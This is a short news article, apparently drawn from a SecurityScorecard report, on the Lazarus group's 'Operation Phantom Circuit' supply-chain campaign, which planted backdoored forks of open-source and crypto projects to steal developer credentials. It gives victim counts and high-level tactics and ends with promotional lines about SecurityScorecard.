A group of North Korean hackers known as Lazarus has shifted from one-time attacks to a long-term strategic approach in a series of software supply chain infiltrations. According to a report by Securityscorecard, Lazarus executed Operation Phantom Circuit, concealing malicious code within trusted software to silently access developers’ data.
The campaign unfolded in multiple phases. In November 2024, 181 developers, mostly from Europe’s tech sector, were impacted. By December, the victim count grew to 1,225, including 284 from India and 21 from Brazil. In January 2025, affected devices rose to 233, with 110 belonging to India’s IT sector.
The primary targets are cryptocurrency app developers, tech companies, and open-source software creators. Lazarus duplicated popular open-source projects and inserted backdoors. Infected repositories included Codementor, Coinproperty, Web3 E-Store, Python passwords, and other crypto-related applications.
By deploying a malicious fork on a developer’s computer, Lazarus activated a backdoor for remote access, data extraction, and transfer to North Korea. Stolen data comprises accounts, authentication details, and password tokens for potential future attacks or intelligence gathering for the DPRK government. The group redirects stolen information to Dropbox to evade detection.
Notably, the malware spreads via Gitlab, a widely used platform for collaborative software development. This allows Lazarus to introduce harmful updates that developers unwittingly install, relying on the source. To mask their activity, the group utilizes VPNs and proxy servers, misleading authorities about the attack’s origin.
Securityscorecard employs robust analytical tools and vast data sets to ensure accurate and relevant assessments. Catering to a diverse clientele, including large corporations, government entities, and small businesses, the company aids in evaluating and enhancing cybersecurity measures.